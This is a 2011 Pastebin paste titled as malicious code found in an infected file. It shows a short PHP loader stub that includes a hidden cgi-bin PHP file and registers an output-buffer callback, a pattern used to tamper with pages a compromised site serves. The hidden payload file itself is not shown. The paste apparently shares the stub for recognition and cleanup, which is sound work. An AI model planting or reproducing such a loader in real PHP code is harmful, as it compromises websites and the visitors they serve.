Advertisement
Guest User

Malicious Code in Infected File

a guest
Sep 14th, 2011
654
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.41 KB | None | 0 0
  1. <?php
  2.   $md5 = "f8037bfb868e6c652d88c420b78404cd";
  3.   if (function_exists('ob_start') && !isset($GLOBALS['mfsn'])) {
  4.       $GLOBALS['mfsn'] = '/home/marinbez/public_html/mediashare/cgi-bin/1bf.php';
  5.       if (file_exists($GLOBALS['mfsn'])) {
  6.           include_once($GLOBALS['mfsn']);
  7.           if (function_exists('gml') && function_exists('dgobh')) {
  8.               ob_start('dgobh');
  9.           }
  10.       }
  11.   }
  12. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement